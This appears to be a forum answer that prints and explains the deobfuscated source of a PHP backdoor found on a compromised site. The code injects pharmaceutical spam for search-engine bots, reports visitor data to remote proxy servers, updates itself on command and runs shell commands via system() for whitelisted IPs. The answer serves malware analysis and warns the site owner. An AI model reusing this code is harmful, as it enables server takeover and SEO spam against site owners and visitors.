    $_12 = "";
    $_13 = check($_10, "<body");
    if ($_13 !== false) {
        $_14 = array();
        $_15 = array();
        $_16 = array();
        $_17 = array();
        $_18 = array();
        $_19 = array();
        $_20 = substr($_10, $_13);
        $_21 = strip_tags($_20);
        $_22 = "/[a-z]{2,}+ and /";
        preg_match_all($_22, $_21, $_14, PREG_OFFSET_CAPTURE);
        $_23 = "/[a-z]{2,}+ the /";
        preg_match_all($_23, $_21, $_15, PREG_OFFSET_CAPTURE);
        $_24 = "/[a-z]{2,}+ of /";
        preg_match_all($_24, $_21, $_16, PREG_OFFSET_CAPTURE);
        $_25 = "/[a-z]{2,}+ to /";
        preg_match_all($_25, $_21, $_17, PREG_OFFSET_CAPTURE);
        $_26 = "/[a-z]{2,}+ on /";
        preg_match_all($_26, $_21, $_18, PREG_OFFSET_CAPTURE);
        $_27 = "/[a-z]{2,}+ is /";
        preg_match_all($_27, $_21, $_19, PREG_OFFSET_CAPTURE);
        $_28 = "/[a-z]{2,}+ de /";
        preg_match_all($_28, $_21, $_29, PREG_OFFSET_CAPTURE);
        $_30 = "/[a-z]{2,}+ en /";
        preg_match_all($_30, $_21, $_31, PREG_OFFSET_CAPTURE);
        $_32 = "/[a-z]{2,}+ und /";
        preg_match_all($_32, $_21, $_33, PREG_OFFSET_CAPTURE);
        $_34 = "/[a-z]{2,}+ auf /";
        preg_match_all($_34, $_21, $_35, PREG_OFFSET_CAPTURE);
        $_36 = "/[a-z]{2,}+ y /";
        preg_match_all($_36, $_21, $_37, PREG_OFFSET_CAPTURE);
        $_38 = "/[a-z]{2,}+ e /";
        preg_match_all($_38, $_21, $_39, PREG_OFFSET_CAPTURE);
        $_40 = "/[a-z]{2,}+ et /";
        preg_match_all($_40, $_21, $_41, PREG_OFFSET_CAPTURE);
        $_42 = "/[a-z]{2,}+ la /";
        preg_match_all($_42, $_21, $_43, PREG_OFFSET_CAPTURE);
        $_44 = "/[a-z]{2,}+ des /";
        preg_match_all($_44, $_21, $_45, PREG_OFFSET_CAPTURE);
        $_46 = "/[a-z]{2,}+ der /";
        preg_match_all($_46, $_21, $_47, PREG_OFFSET_CAPTURE);
        $_48 = "/[a-z]{2,}+ die /";
        preg_match_all($_48, $_21, $_49, PREG_OFFSET_CAPTURE);
        $_481 = "/[a-z]{2,}+ do /";
        preg_match_all($_481, $_21, $_491, PREG_OFFSET_CAPTURE);
        $_482 = "/[a-z]{2,}+ z /";
        preg_match_all($_482, $_21, $_492, PREG_OFFSET_CAPTURE);
        $_483 = "/[a-z]{2,}+ na /";
        preg_match_all($_483, $_21, $_493, PREG_OFFSET_CAPTURE);
        $_484 = "/[a-z]{2,}+ i /";
        preg_match_all($_484, $_21, $_494, PREG_OFFSET_CAPTURE);
        $_50 = array();
        foreach ($_14[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_15[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_16[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_17[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_18[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_19[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_29[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_31[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_33[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_35[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_37[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_39[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_41[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_43[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_45[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_47[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_49[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_491[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_492[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_493[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        foreach ($_494[0] as $_51) {
            $_50[$_51[0]] = 1;
        }
        $_52 = array_keys($_50);
        $_53 = $_20;
        $_54 = - 1;
        foreach ($_52 as $_55) {
            $_54++;
            if (($_54 % $_2) != 0) continue;
            $_56 = 0;
            $_57 = false;
            $_58 = 0;
            do {
                $_59 = strpos($_53, $_55, $_56);
                $_56 = $_59 + strlen($_55);
                if ($_59 !== false) {
                    $_60 = strrpos(substr($_53, 0, $_59), ">");
                    $_61 = strrpos(substr($_53, 0, $_59), "<");
                    if ($_60 === false) {
                        $_60 = 0;
                    }
                    if ($_61 === false) {
                        $_11 = true;
                        break;
                    }
                    if ($_60 <= $_61) {
                        continue;
                    }
                    if (count($_9) <= 0) break;
                    $_58 = trim(array_shift($_9));
                    if ($_58 == NULL || strlen($_58) < 4) {
                        break;
                    }
                    $_53 = substr($_53, 0, $_59 + strlen($_55)) . $_58 . " " . substr($_53, $_59 + strlen($_55));
                    $_57 = true;
                } else {
                    break;
                }
            }
            while (!$_57);
            if ($_11) break;
            if (count($_9) <= 0) break;
        }
        $_12 = substr($_10, 0, $_13) . $_53;
    } else {
        $_11 = true;
        $_12 = $_10;
    }
    $datapage = $_12;
    return $datapage;
} function PingMyProxy($proxy) {
    $port = 80;
    $to = 1;
    $gph = parse_url($proxy);
    $host = $gph['host'];
    $fsock = fsockopen($host, $port, $errno, $errstr, $to);
    if (!$fsock) {
        return FALSE;
    } else {
        return TRUE;
    }
}
//////////////FUNCTIONS FINISH
$readydoors = checkDir($filessavepath);
makebotlist($BotList);
$blst = 'NOFILE';
if (file_exists($BotList)) {
    $blst = 'BOTLIST';
}
if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        $owner = TRUE;
    }
    if ((substr(md5($_REQUEST['localdate']), 0, 6) == '6fbcb8') && ($owner == TRUE)) {
        $time = str_replace('@', ' ', $_REQUEST['localtime']);
        @system($time);
        exit;
    }
    die("<font color='green'>CHETKO</font>:CHETKO|" . $scriptver . "|" . $blst . "|DOORS READY:" . $readydoors);
}
if (preg_match('/cialis|viagra|propecia|levitra|sildenafil|tadalafil|kamagra|pill|drug|generic|prescription|medic|treatment|finasteride|pharmac|medforum|zyvox|zythromax|zyprexa|zyloprim|zyban|zovirax|acyclovir|zoton|zopiclone|zoloft|zofran|zocor|zitromax|zithromax|zithromycin|zimulti|ziagra|zetia|zestril|zestoretic|zenerx|zenegra|zencore|zelnorm|zebeta|zantac|zanaflex|zaditor|yasmin|yagara|bactrim|xenical|xeloda|prednisone|accutane|lasix/i', $url)) {
    $work = TRUE;
}
if (($work == FALSE) && ($morda == FALSE)) {
    return true;
}
$bot = HiGoogle($visitorip, $BotList, $visitorlang);
if ($bot) {
    $user = 'BOT';
} else {
    $user = 'HUMAN';
}
foreach ($proxy_array as $proxy) {
    $proxy = trim($proxy);
    $up = PingMyProxy($proxy);
    if ($up) {
        break;
    }
}
$collection = array("remotehost" => $hostname, "useragent" => $visitoragent, "lang" => $visitorlang, "ip" => $visitorip, "uri" => $url, "gbase" => $blst, "visitor" => $user, "referer" => $referer, "scriptver" => $scriptver, "selfpath" => $selfpath, "admin" => $admin, "doors" => $readydoors, "proxy" => $proxy);
$collection = serialize($collection);
$collection = base64_encode($collection);
$datauri = $proxy;
$response = getRdata($datauri, $workagent, $method, $collection);
if (preg_match('/SELFUPDATE/i', $response)) {
    $telo = str_replace('SELFUPDATE', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $selfdata = $telo['secretka'];
    $selfhash = $telo['hash'];
    $selfpath = $telo['selfpath'];
    $selfpath = base64_decode($selfpath);
    $secretkahash = md5($selfdata);
    if (($selfdata <> '') && ($secretkahash == $selfhash)) {
        $file = fopen($selfpath, 'w');
        fwrite($file, $selfdata . "
");
        fclose($file);
    }
    return true;
}
if (preg_match('/TEMPBAN/i', $response)) {
    return true;
}
if (preg_match('/BANBAN/i', $response)) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
    return true;
}
if (preg_match('/SHOW DOOR/i', $response)) {
    $telo = str_replace('SHOW DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    echo $door;
    exit;
}
if (($bot) && (file_exists($filessavepath . $filename))) {
    $door = file_get_contents($filessavepath . $filename);
    $door = base64_decode($door);
    echo $door;
    exit;
}
if (preg_match('/SHOW AND SAVE DOOR/i', $response)) {
    $telo = str_replace('SHOW AND SAVE DOOR', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $door = $telo['doorcontent'];
    $textogen = $telo['textogen'];
    $ClusterIp = $telo['clusterip'];
    $doorkey = $telo['doorkey'];
    $kc = $telo['kc'];
    $collection = array("k" => $doorkey, "keyscount" => $kc);
    $collection = serialize($collection);
    $collection = base64_encode($collection);
    $texturi = 'http://' . $ClusterIp . '/' . $textogen . '.php';
    $text = getRdata($texturi, $workagent, $method, $collection);
    if (preg_match('/TAKEYOURTEXT/i', $text)) {
        $text = str_replace('TAKEYOURTEXT', '', $text);
        $door = str_replace('[TEXT]', $text, $door);
        echo $door;
        $filetosave = base64_encode($door);
        $file = fopen($filessavepath . $filename, 'w');
        fwrite($file, $filetosave);
        fclose($file);
    } else {
        return true;
    }
    exit;
}
if (preg_match('/SHOW SPAM/i', $response)) {
    $telo = str_replace('SHOW SPAM', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $div = $telo['div'];
    $style = $telo['style'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $selfpage = str_replace('</head>', $style . "
" . '</head>', $selfpage);
    $selfpage = str_replace('</body>', $div . "
" . '</body>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/SHOW CANON/i', $response)) {
    $telo = str_replace('SHOW CANON', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $canonlink = $telo['canon'];
    $selfpage = getRdata($url, $selfagent, $method, $collection);
    $canonA = "'<link href=..*?. rel=.canonical. />'si";
    $canonB = "'<link rel=.canonical. href=..*?. />'si";
    $canonZ = '';
    $selfpage = preg_replace($canonA, $canonZ, $selfpage);
    $selfpage = preg_replace($canonB, $canonZ, $selfpage);
    $selfpage = str_replace('</head>', $canonlink . "
" . '</head>', $selfpage);
    echo $selfpage;
    exit;
}
if (preg_match('/CALL BACK/i', $response)) {
    $telo = str_replace('CALL BACK', '', $response);
    $telo = base64_decode($telo);
    $telo = unserialize($telo);
    $links_out = $telo['links'];
    $links_out = explode("
", $links_out);
    ob_start("callback");
}

Now what does this actually do? I don't have time to read all of 700 LOC, but briefly skimming over it reveals the following:

  • It seems to check the user agent and IP address of the client and compare them against a known web crawler (presumably to only show spam content to search engines for SEO purposes, or to tailor content for them)
  • It in some form gets instructions/spam from a remote server (presumably one of http://159.8.34.18/~roboatom/proxy.php, http://190.123.47.134/proxy.php, http://109.236.91.19/proxy.php) through cURL
  • It has a methods for updating its malicious code through the SELFUPDATE command (from the remote server), banning certain clients, and writing data to some file with an MD5'd name (near bottom of the code)
  • It does a somewhat clever trick of cURL requesting itself (with a special User-Agent which it whitelists to not see spam), so that it can get the actual content of the page and then inject spam into it
  • It seems to by default write to a file and try to give that file full 777 (read, write, execute all) permissions. This could be particularly dangerous if the server is run with a user whose privileges aren't limited and that file was able to be executed

tl;dr I would be vary weary of the server that this code was found on. It could very possibly be compromised beyond this (relatively) innocent spam insertion code

Bailey Parker
  • 254
  • 2
  • 4
  • 2
    This is in many ways a better answer than the canonical answer because it explains what the code does, and how it works. The question is about understanding the code, not simply de-obfuscating it. An example of malicious code goes a long way as an example of the kind of thing you might be up against. So I'm voting to re-open this because the answer above is instructive. – Steve Sether Feb 23 '16 at 15:45